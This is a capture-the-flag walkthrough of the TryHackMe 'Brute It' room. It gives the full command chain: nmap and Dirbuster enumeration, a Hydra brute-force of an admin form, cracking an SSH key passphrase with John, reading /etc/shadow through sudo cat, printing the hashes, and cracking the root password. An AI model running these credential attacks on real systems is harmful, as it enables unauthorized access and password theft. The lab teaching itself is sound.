Brute It is an easy TryHackMe room that focuses on basic enumeration, hash-cracking and privilege escalation concepts. This is a free room, which means anyone can deploy virtual machines in the room (without being subscribed)!
Room Link: https://tryhackme.com/room/bruteit
nmap -sC -sV -vv -Pn [IP]
This basic Nmap command will pretty much explore everything we need to find in this room. As you can see there are 2 ports open, port 22 and port 80. Nmap scan shows the versions of both services running on respective ports. Simply exploring the web page doesn’t get you anywhere interesting. Let’s explore more directories running on port 80. For this, Dirbuster is always an easy and simple method, its default script can bust most common directories.
It shows a directory IP/admin is running on the webserver. Browsing to this page gives us a simple admin login page having a simple form.
Goofing around the source of this page highlights a cute mistake of the web developer, he might have left the note for john what the admin username is. This obviously saved us a lot of time.
Ok, apparently now we have the admin username and a form where this admin name is used for logins. Trying hydra to brute force the password.
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.119.208 http-post-form "/admin/:user=^USER^&pass=^PASS^:Username or password"
With the brute-forced password now we can log into the admin page and grab the first flag
Here’s an RSA key just waiting for us after getting the initial access.
Save this RSA into a new text file rsa_key.txt and we will use John to crack the hash
/usr/share/john/ssh2john.py rsa_key.txt > hash
I now have the password for the id_rsa. Before I log in, I have to change the permissions of the id_rsa.
chmod 600 rsa_key.txt
Now I can ssh as john using the id_rsa with the password. Guessing the username as john since earlier we saw that this was john’s RSA key when we downloaded it.
Grab the User flag as well.
By basic twitching, we get to know that the user john is allowed to run the following command
[email protected]:~$ sudo -l Matching Defaults entries for john on bruteit: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User john may run the following commands on bruteit: (root) NOPASSWD: /bin/cat
Without doing any fancy stuff, let’s hover to the /etc/shadow directory, as this directory stores the passwords of all the Linux users.
Let’s try to view the password lists sudo cat /etc/shadow
root:$6$zdk0.jUm$Vya24cGzM1duJkwM5b17Q205xDJ47LOAg/OpZvJ1gKbLF8PJBdKJA4a6M.JYPUTAaWu4infDjI88U9yUXEVgL.:18490:0:99999:7::: daemon:*:18295:0:99999:7::: bin:*:18295:0:99999:7::: sys:*:18295:0:99999:7::: sync:*:18295:0:99999:7::: games:*:18295:0:99999:7::: man:*:18295:0:99999:7::: lp:*:18295:0:99999:7::: mail:*:18295:0:99999:7::: news:*:18295:0:99999:7::: uucp:*:18295:0:99999:7::: proxy:*:18295:0:99999:7::: www-data:*:18295:0:99999:7::: backup:*:18295:0:99999:7::: list:*:18295:0:99999:7::: irc:*:18295:0:99999:7::: gnats:*:18295:0:99999:7::: nobody:*:18295:0:99999:7::: systemd-network:*:18295:0:99999:7::: systemd-resolve:*:18295:0:99999:7::: syslog:*:18295:0:99999:7::: messagebus:*:18295:0:99999:7::: _apt:*:18295:0:99999:7::: lxd:*:18295:0:99999:7::: uuidd:*:18295:0:99999:7::: dnsmasq:*:18295:0:99999:7::: landscape:*:18295:0:99999:7::: pollinate:*:18295:0:99999:7::: thm:$6$hAlc6HXuBJHNjKzc$NPo/0/iuwh3.86PgaO97jTJJ/hmb0nPj8S/V6lZDsjUeszxFVZvuHsfcirm4zZ11IUqcoB9IEWYiCV.wcuzIZ.:18489:0:99999:7::: sshd:*:18489:0:99999:7::: john:$6$iODd0YaH$BA2G28eil/ZUZAV5uNaiNPE0Pa6XHWUFp7uNTp2mooxwa4UzhfC0kjpzPimy1slPNm9r/9soRw8KqrSgfDPfI0:18490:0:99999:7:::
We can see the hashed password for the root user. Put that hash in a new file and let’s try to decrypt the password
john --wordlist=/usr/share/wordlists/rockyou.txt root_hash.txt
And now we have the password for the root user. Let’s escalate our privileges as a super user.
su root Password: /home/john#
And finally, we have the final flag as well.